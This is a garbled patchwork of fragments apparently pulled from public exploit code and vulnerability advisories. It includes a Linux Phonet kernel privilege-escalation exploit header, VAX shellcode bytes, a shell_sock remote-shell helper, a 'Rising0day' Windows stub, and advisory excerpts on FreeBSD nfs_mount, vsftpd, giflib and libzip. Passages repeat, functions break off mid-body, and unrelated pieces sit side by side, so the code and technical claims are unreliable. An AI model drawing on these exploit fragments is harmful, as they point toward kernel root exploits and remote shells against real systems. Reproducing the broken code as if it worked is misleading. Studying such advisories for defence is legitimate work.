struct
/* Globals */
int sockfd;        /* socket descriptor used by the tool; presumably opened elsewhere (not shown here) */
int nhrp_req_id;   /* NHRP request id value; set elsewhere — as a file-scope global it starts at zero */
/* GRE header */
/*
 * GRE header as laid out on the wire: a 16-bit flags/version word, a 16-bit
 * protocol type, then a 32-bit key.  Fields hold raw wire values; no byte-order
 * conversion happens in this definition.  NOTE(review): GRE makes the key
 * optional (keyed on a flag bit), so sizeof(struct gre_h) is only the header
 * length when the peer always sends a key — confirm before relying on it.
 * `unsigned short`/`unsigned int` are assumed to be 16/32 bits here; fixed-width
 * types would make that explicit.
 */
struct gre_h {
unsigned short flags; /* GRE flags/version word (network byte order on the wire) */
unsigned short ptype; /* encapsulated protocol type (network byte order on the wire) */
unsigned int key; /* GRE key; only meaningful when the key-present flag is set */
};
PVOID ProcessInformation,
ULONG ProcessInformationLength,
PULONG ReturnLength
);
/*
 * Counted byte string in the NT native-API style.  NOTE(review): per the NT
 * definition, Length is the number of bytes in use and MaximumLength the
 * allocated size of Buffer; Buffer is NOT guaranteed to be NUL-terminated, so
 * every read of it must be bounded by Length — confirm against the headers.
 */
typedef struct _STRING {
USHORT Length; /* bytes of Buffer currently in use */
USHORT MaximumLength; /* allocated size of Buffer, in bytes */
PCHAR Buffer; /* pointer to the (possibly unterminated) characters */
} STRING;
typedef STRING *PSTRING; /* pointer alias for STRING */
PVOID ProcessInformation,
ULONG ProcessInformationLength,
PULONG ReturnLength
);
/*
 * Counted byte string in the NT native-API style.  NOTE(review): per the NT
 * definition, Length is the number of bytes in use and MaximumLength the
 * allocated size of Buffer; Buffer is NOT guaranteed to be NUL-terminated, so
 * every read of it must be bounded by Length — confirm against the headers.
 */
typedef struct _STRING {
USHORT Length; /* bytes of Buffer currently in use */
USHORT MaximumLength; /* allocated size of Buffer, in bytes */
PCHAR Buffer; /* pointer to the (possibly unterminated) characters */
} STRING;
typedef STRING *PSTRING; /* pointer alias for STRING */
nmount(2) system calls. In order for them to be enabled for unprivileged
users, the sysctl(8) variable vfs.usermount must be set to a non-zero
value.
The function nfs_mount() performs insufficient input validation when
copying data passed in a structure of type nfs_args from userspace to the
kernel. Specifically, the file handle buffer to be mounted (args.fh) and
its size (args.fhsize) are completely user-controllable. The unbounded copy
operation is in file src/sys/nfsclient/nfs_vfsops.c (the excerpts are from
8.0-RELEASE):
* service? What are you, some kind of script kiddie? No, the answer is
* obvious. You must read the uninitialized bytes of the kernel stack, since
* these bytes contain all the secrets of the universe and the meaning of life.
*
* How can you accomplish this insidious feat? You immediately discard the
* notion of looking for uninitialized struct members that are copied back to
* userspace, since you clearly need something far more elite. In order to
* prove your superiority, your exploit must be as sophisticated as your taste
* in obscure electronic music. After scanning the kernel source for good
* candidates, you find your target and begin to code...
*
> * these bytes contain all the secrets of the universe and the meaning of
>life.
> *
> * How can you accomplish this insidious feat? You immediately discard
>the
> * notion of looking for uninitialized struct members that are copied
>back to
> * userspace, since you clearly need something far more elite. In order
>to
> * prove your superiority, your exploit must be as sophisticated as your
>taste
(although there is no requirement to do so).
An IPComp datagram consists of an IP header with ip->ip_p set to 108, followed
by a 32-bit IPComp header, described in C syntax below.
/*
 * IPComp header (RFC 3173) that follows the IP header when ip_p == 108.
 * Exactly four bytes; the fields are raw wire values.
 */
struct ipcomp {
uint8_t comp_nxt; // Next Header: protocol of the payload once decompressed
uint8_t comp_flags; // Reserved: sent as zero and ignored on receipt (RFC 3173)
uint16_t comp_cpi; // Compression Parameter Index; network byte order on the wire, convert before comparing
};
>> * these bytes contain all the secrets of the universe and the meaning of
>> life.
>> *
>> * How can you accomplish this insidious feat? You immediately discard
>> the
>> * notion of looking for uninitialized struct members that are copied
>> back to
>> * userspace, since you clearly need something far more elite. In order
>> to
>> * prove your superiority, your exploit must be as sophisticated as your
>> taste
>>> * these bytes contain all the secrets of the universe and the meaning of
>>> life.
>>> *
>>> * How can you accomplish this insidious feat? You immediately discard
>>> the
>>> * notion of looking for uninitialized struct members that are copied
>>> back to
>>> * userspace, since you clearly need something far more elite. In order
>>> to
>>> * prove your superiority, your exploit must be as sophisticated as your
>>> taste
#include <stdlib.h>
#define VTP_DOMAIN_SIZE 32
#define VTP_TIMESTAMP_SIZE 12
struct vtp_summary {
u_int8_t version;
u_int8_t code;
u_int8_t followers;
u_int8_t dom_len;
u_int8_t domain[VTP_DOMAIN_SIZE];
#endif
}
unsigned long resolv(const char *host)
{
struct hostent *hp;
unsigned long host_ip;
host_ip = inet_addr(host);
if( host_ip == INADDR_NONE )
{
#endif
}
unsigned long resolv(const char *host)
{
struct hostent *hp;
unsigned long host_ip;
host_ip = inet_addr(host);
if( host_ip == INADDR_NONE )
{
#include <stdlib.h>
#define VTP_DOMAIN_SIZE 32
#define VTP_TIMESTAMP_SIZE 12
struct vtp_summary {
u_int8_t version;
u_int8_t code;
u_int8_t followers;
u_int8_t dom_len;
u_int8_t domain[VTP_DOMAIN_SIZE];
Due to an uninitialised value in devfs_open(), the following function is called with
fp->f_vnode = 0:
static int
devfs_fp_check(struct file *fp, struct cdev **devp, struct cdevsw **dswp)
{
*dswp = devvn_refthread(fp->f_vnode, devp);
if (*devp != fp->f_data) {
if (*dswp != NULL)
* trivially allows you to get root. However, I found another way to get root
* from CAP_SYS_ADMIN...the hard way.
*
* This exploit leverages a signedness error in the Phonet protocol. By
* specifying a negative protocol index, I can craft a series of fake
* structures in userspace and cause the incrementing of an arbitrary kernel
* address, which I then leverage to execute arbitrary kernel code.
*
* Greets to spender, cloud, jono, kees, pipacs, redpig, taviso, twiz, stealth,
* and bla.
*
static int own_child(int *us)
{
int pid;
int s[2];
struct msghdr mh;
char crap[1024];
struct iovec iov;
struct cmsghdr *c;
int *fd;
int rc;
#include <netdb.h>
int socket_connect(char *server, int port) {
int fd;
struct sockaddr_in sock;
struct hostent *host;
memset(&sock, 0, sizeof(sock));
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
Original URL:
http://securityreason.com/achievement_securityalert/99
--- 0.Description ---
The getservbyname() and getservbyport() functions each return a pointer to an object with the following structure, containing the broken-out fields of a line in the network services data base,
struct servent *
getservbyname(const char *name, const char *proto);
struct servent *
- --- 0.Description ---
The fts functions are provided for traversing UNIX file hierarchies.
The fts_open() function returns a "handle" on a file hierarchy, which is then supplied to the other fts functions.
The function fts_read() returns a pointer to a structure describing one of the files in the file hierarchy.
The function fts_children() returns a pointer to a linked list of structures, each of which describes one of the files contained in a directory within the hierarchy.
typedef struct _ftsent {
unsigned short fts_info; /* flags for FTSENT structure */
char *fts_accpath; /* access path */
{
static char prevuser[MAX_LOGIN + 1], prevpass[61];
char *p, *q, *end;
int n;
char *user, *pass, *gecos, *home, *shell;
struct passwd *pw;
int found = 0;
p = buf;
end = buf + count;
while (p < end && (p = memchr(p, '/', end - p))) {
"\r\nPASS:\r\n";
static int
shell_sock (char *host, int port)
{
struct sockaddr_in addr;
int sockfd;
sockfd = socket(PF_INET, SOCK_STREAM, 0);
if (sockfd == -1) {
perror ("socket");
First, the Logical Screen Size is read and stored in the following
calling sequence (As giflib is an Open Source MIT-licenced library, the
source was available for analysis):
'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'. The last
function, 'DGifGetScreenDesc()', stores the _Logical Screen Width and
Height_ in a structure called 'GifFileType':
/-----------
Int DGifGetScreenDesc(GifFileType * GifFile) {
...
#include <stdio.h>
#include <unistd.h>
#include <string.h>
int port=21; /* target TCP port; defaults to 21, the well-known FTP control port */
struct hostent *he; /* resolved target host; filled in elsewhere (not shown here) */
struct sockaddr_in their_addr; /* IPv4 peer address, presumably built from he and port elsewhere */
int konekt(char *addr)
#include <netdb.h>
int socket_connect(char *server, int port) {
int fd;
struct sockaddr_in sock;
struct hostent *host;
memset(&sock, 0, sizeof(sock));
if((fd = socket(AF_INET, SOCK_STREAM, 0)) < 0) return -1;
__asm{mov edi ,edi
nop };
}
/* NT SYSTEM_INFORMATION_CLASS selectors (undocumented API; presumably passed
 * to NtQuerySystemInformation, which is not visible here).  The values match
 * the commonly published numbering. */
enum { SystemModuleInformation = 11,
SystemHandleInformation = 16 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
// Rising0day.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "windows.h"
/* NT SYSTEM_INFORMATION_CLASS selector (undocumented API; presumably passed
 * to NtQuerySystemInformation, which is not visible here). */
enum { SystemModuleInformation = 11 };
typedef struct {
ULONG Unknown1;
ULONG Unknown2;
PVOID Base;
ULONG Size;
ULONG Flags;
005ACE46 |. E8 65D7FFFF CALL <fbserver.rem_port::disconnect>
; \port->disconnect(sendL, receive)
- -----------/
The type of 'port' is 'struct rem_port', as defined in
'src/remote/remote.h'. This struct type has a 'disconnect()' function
that is implemented in 'src/remote/server.cpp':
/-----------
so any next {{*},Recursion} will increment the complexity. Let's see what is wrong and where. In vsftpd, the main problem is in ls.c.
- -ls.c--
int
vsf_filename_passes_filter(const struct mystr* p_filename_str,
const struct mystr* p_filter_str)
{
...
else if (last_token == '{')
{
See the VAX Architecture Reference Manual (VARM) or the
VAX Architecture Handbook.
http://www.bitsavers.org/pdf/dec/vax/archSpec has a copy
of the internal version of the VARM,
which will help explain the stack frame and the instruction set.
*/
unsigned char shellcode[] =
"\021\017" /* brb shellcode+0x11 (PC-relative) */
"\272\001" /* popr $0x1 (this is a mask: pop one word into r0) */
--- 1.Description ---
libzip allows remote and local attackers to cause a denial of service (NULL pointer dereference) if the ZIP_FL_UNCHANGED flag is set.
-lib/zip_name_locate.c---
int
_zip_name_locate(struct zip *za, const char *fname, int flags,
struct zip_error *error)
{
int (*cmp)(const char *, const char *);
const char *fn, *p;
int i, n;